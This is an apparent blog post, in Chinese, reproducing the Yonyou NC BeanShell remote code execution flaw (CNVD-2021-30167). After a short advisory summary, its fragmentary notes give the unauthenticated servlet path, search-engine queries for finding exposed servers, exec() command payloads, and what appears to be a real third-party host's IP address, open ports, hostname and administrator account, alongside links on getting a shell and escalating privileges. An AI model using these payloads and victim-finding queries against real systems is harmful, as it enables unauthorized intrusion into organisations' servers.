漏洞复现-用友_amingmm的博客-爱代码爱编程
CNVD-2021-30167 用友NC 命令执行漏洞
一、漏洞情况分析
用友NC采用J2EE架构,面向大型企业集团和成长中的集团企业的信息化需求,为集团企业提供建模、开发、集成、运行、管理一体化的信息化解决方案。
2021年6月2日,用友公司发布了关于用友NC BeanShell远程代码执行漏洞的风险通告。由于用友NC对外开放了BeanShell的测试接口,未经身份验证的攻击者利用该测试接口,通过向目标服务器发送恶意构造的Http请求,在目标系统上直接执行任意代码,从而获得目标服务器权限。
CNVD对该漏洞的综合评级为“高危”。
二、漏洞影响范围
漏洞影响的产品版本包括:
用友NC 6.5
三、漏洞复现
访问未授权页面
http://:/servlet/~ic/bsh.servlet.BshServlet
app=“用友-UFIDA-NC” && country=“KR”
intitle:“Yonyou NC”
/servlet/~ic/bsh.servlet.BshServlet
https://blog.csdn.net/MSB_WLAQ/article/details/120556480 java 命令执行 getshellhttps://zhuanlan.zhihu.com/p/397421526
http://59.52.8.34:808/servlet/~ic/bsh.servlet.BshServlet
cmd Microsoft Windows Server 2003 DELL-69B95F93F5
https://blog.csdn.net/qq_45552960/article/details/104739680 03 提权
Apache Tomcat/5.5.9
dell-69b95f93f5\administrator
Discovered open port 805/tcp on 59.52.8.34
Discovered open port 888/tcp on 59.52.8.34
Discovered open port 808/tcp on 59.52.8.34
Discovered open port 1433/tcp on 59.52.8.34
https://blog.csdn.net/anlr2020/article/details/119873672 刷洞
exec("ifconfig");
exec("help")
exec("net config workstation")
exec("netstat -ano -p tcp")
exec("whoami")
https://www.bilibili.com/read/cv12618507/
https://www.bilibili.com/read/cv11816691